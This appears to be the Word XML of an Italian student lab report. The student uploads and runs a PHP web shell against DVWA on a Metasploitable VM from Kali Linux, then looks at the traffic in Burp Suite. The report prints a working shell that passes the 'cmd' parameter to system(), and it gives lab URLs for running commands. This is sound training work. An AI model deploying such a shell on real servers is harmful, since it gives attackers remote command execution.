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14C8E4" w14:textId="096245FC" w:rsidR="002E0C2F" w:rsidRDefault="00345584">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345584">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S6-L1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA4C4BA" w14:textId="77777777" w:rsidR="00345584" w:rsidRDefault="00345584">
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve">Traccia dell'Esercizio: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7B8145" w14:textId="77777777" w:rsidR="00534455" w:rsidRDefault="00345584" w:rsidP="00534455">
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve">Preparazione dell'Ambiente: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F6C78E" w14:textId="401B30F9" w:rsidR="00534455" w:rsidRDefault="00345584" w:rsidP="00534455">
      <w:r w:rsidRPr="00534455">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Esercizio Traccia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC41D1F" w14:textId="5BC7B850" w:rsidR="00345584" w:rsidRDefault="00345584" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve"> ○ Configurate la macchina virtuale </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00345584">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00345584">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746D98DA" w14:textId="64A3ADC8" w:rsidR="00345584" w:rsidRDefault="00345584" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve"> ○ Configurate la macchina virtuale Kali Linux. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF198F8" w14:textId="77777777" w:rsidR="00345584" w:rsidRDefault="00345584" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve"> ○ Verificate la connessione tra le due macchine con un semplice </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00345584">
        <w:t>ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F6BF3" w14:textId="77777777" w:rsidR="00534455" w:rsidRDefault="00345584" w:rsidP="00534455">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00534455">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Caricamento della Shell PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A0AC56" w14:textId="233BB5BE" w:rsidR="00534455" w:rsidRDefault="00534455" w:rsidP="00534455">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="00345584" w:rsidRPr="00345584">
        <w:t xml:space="preserve">○ Accedete alla DVWA sulla macchina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00345584" w:rsidRPr="00345584">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00345584" w:rsidRPr="00345584">
        <w:t xml:space="preserve"> tramite il browser della Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B575E9F" w14:textId="125EA1C4" w:rsidR="00345584" w:rsidRDefault="00534455" w:rsidP="00534455">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00345584" w:rsidRPr="00345584">
        <w:t xml:space="preserve"> ○ Navigare alla sezione File Upload della DVWA. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5808D44E" w14:textId="1B6F17AD" w:rsidR="00345584" w:rsidRDefault="00345584" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve">○ Create una semplice shell PHP (ad esempio, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00345584">
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve">) e caricatela attraverso il modulo </w:t>
      </w:r>
      <w:r w:rsidR="00534455">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve">di upload. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D7AFE7" w14:textId="77777777" w:rsidR="00345584" w:rsidRDefault="00345584" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00345584">
        <w:t>○ Verificate che il file sia stato caricato con successo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292CBD27" w14:textId="6E684A8B" w:rsidR="00345584" w:rsidRDefault="00345584" w:rsidP="00534455">
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00534455">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Esecuzione della Shell PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158E51AB" w14:textId="77777777" w:rsidR="00345584" w:rsidRDefault="00345584" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve">○ Accedete alla shell caricata tramite il browser. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5072452B" w14:textId="77777777" w:rsidR="00345584" w:rsidRDefault="00345584" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve">○ Utilizzate la shell per eseguire comandi da remoto sulla macchina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00345584">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FD3BF3" w14:textId="2B860B75" w:rsidR="00345584" w:rsidRPr="00534455" w:rsidRDefault="00345584" w:rsidP="00534455">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00534455">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Intercettazione e Analisi con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00534455">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BurpSuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00534455">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62800DF1" w14:textId="77777777" w:rsidR="00345584" w:rsidRDefault="00345584" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve"> ○ Avviate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00345584">
        <w:t>BurpSuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve"> e configurate il browser per utilizzare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00345584">
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve"> come proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FCF81B" w14:textId="77777777" w:rsidR="00345584" w:rsidRDefault="00345584" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve"> ○ Intercettate le richieste HTTP/HTTPS effettuate durante il processo di upload e di esecuzione della shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D858396" w14:textId="65A3C658" w:rsidR="00345584" w:rsidRDefault="00345584" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00345584">
        <w:t xml:space="preserve"> ○ Analizzate le richieste e le risposte per comprendere il funzionamento e individuare eventuali vulnerabilità.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252B34BC" w14:textId="77777777" w:rsidR="00534455" w:rsidRDefault="00534455" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5EC9BC" w14:textId="77777777" w:rsidR="00534455" w:rsidRDefault="00534455" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="543A0F93" w14:textId="77777777" w:rsidR="00534455" w:rsidRDefault="00534455" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5468F957" w14:textId="77777777" w:rsidR="00534455" w:rsidRDefault="00534455" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A29EB8E" w14:textId="77777777" w:rsidR="00534455" w:rsidRDefault="00534455" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E3B5472" w14:textId="77777777" w:rsidR="00534455" w:rsidRDefault="00534455" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB9056B" w14:textId="77777777" w:rsidR="00534455" w:rsidRDefault="00534455" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9B9C26" w14:textId="6C9163AC" w:rsidR="00534455" w:rsidRDefault="00534455" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00534455">
        <w:lastRenderedPageBreak/>
        <w:t>VERIFICA PING TRA KALI E META</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF8B972" w14:textId="6858928B" w:rsidR="00534455" w:rsidRDefault="00534455" w:rsidP="00345584">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B04FD2" wp14:editId="6DBC3560">
            <wp:extent cx="6111240" cy="2004060"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="97131007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F670C" w14:textId="77777777" w:rsidR="00F334B5" w:rsidRDefault="00F334B5" w:rsidP="00F334B5">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30ED0A09" w14:textId="6CB65FC0" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00F334B5">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CREIAMO UN FILE E LO SALVIAMO COEM </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SHELL.PHP( di</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> seguito il contenuto del file )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7702D2" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRPr="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C142AA">
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C142AA">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C142AA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB41A83" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRPr="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>($_GET['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246A06E8" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRPr="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    echo "&lt;pre&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1297BABD" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRPr="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ($_GET['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E3B0EF" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRPr="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    system($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>); echo "&lt;/pre&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7707BD94" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRPr="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F00C129" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C142AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "Utilizzo</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>: ?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=&lt;comando&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF3F66" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749B07D0" w14:textId="0D300F7D" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A99A54A" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A228814" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06AF45F6" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76FA5A33" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66148056" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1345E44C" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E433318" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DAB320A" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77341772" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4218BD1E" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">APRIREMO MESLOITABLE E ANDREMO SU DVWA e caricheremo il file che abbiamo scritto di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per poi scrivere il link </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E22ADDD" w14:textId="287905D9" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00E0396E">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>http://192.168.1.1</w:t>
        </w:r>
        <w:r w:rsidRPr="00E0396E">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>09</w:t>
        </w:r>
        <w:r w:rsidRPr="00E0396E">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>/dvwa/hackable/uploads/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D8A11C1" w14:textId="208A9925" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>e possiamo vedere come il file è stato caricato con successo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C929BA" w14:textId="091823D1" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D912AAC" wp14:editId="6BAF5814">
            <wp:extent cx="6111240" cy="2628900"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="349791765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63C99" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55EEB37D" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2603ED33" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA89571" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5E444D" w14:textId="12B3B656" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APRIAMO BURP SUITE sta volta inserendo il link </w:t>
      </w:r>
      <w:r w:rsidRPr="004D732A">
        <w:t>http://192.168.1.115/dvwa/hackable/uploads/shell.php?cmd=pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AFC48A" w14:textId="01E23888" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="488B39BD" wp14:editId="2E5E1DF0">
            <wp:extent cx="6111240" cy="2354580"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="1353684359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575FA" w14:textId="71C9A268" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="004D732A"/>
    <w:p w14:paraId="228329E9" w14:textId="77777777" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="159E6512" w14:textId="4C9E0401" w:rsidR="00C142AA" w:rsidRDefault="00C142AA" w:rsidP="00C142AA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A1716F4" wp14:editId="0021DE69">
            <wp:extent cx="6118860" cy="2758440"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1347325200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E490C" w14:textId="6F767E7C" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Relazione su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite per Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525F386E" w14:textId="70D7BB9F" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Introduzione a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04C7A7" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite è uno strumento completo per test di sicurezza delle applicazioni web, sviluppato dalla società </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Viene ampiamente utilizzato dagli specialisti di sicurezza e dagli </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ethical</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hacker per rilevare vulnerabilità nelle applicazioni web. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite è particolarmente adatto per testare applicazioni web e rilevare minacce comuni come l'injection, il cross-site scripting (XSS), le vulnerabilità di autenticazione, ecc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146C21FE" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1360DC53" w14:textId="19B0642C" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Installazione su Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F127D5" w14:textId="77777777" w:rsidR="004D732A" w:rsidRDefault="004D732A" w:rsidP="004D732A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
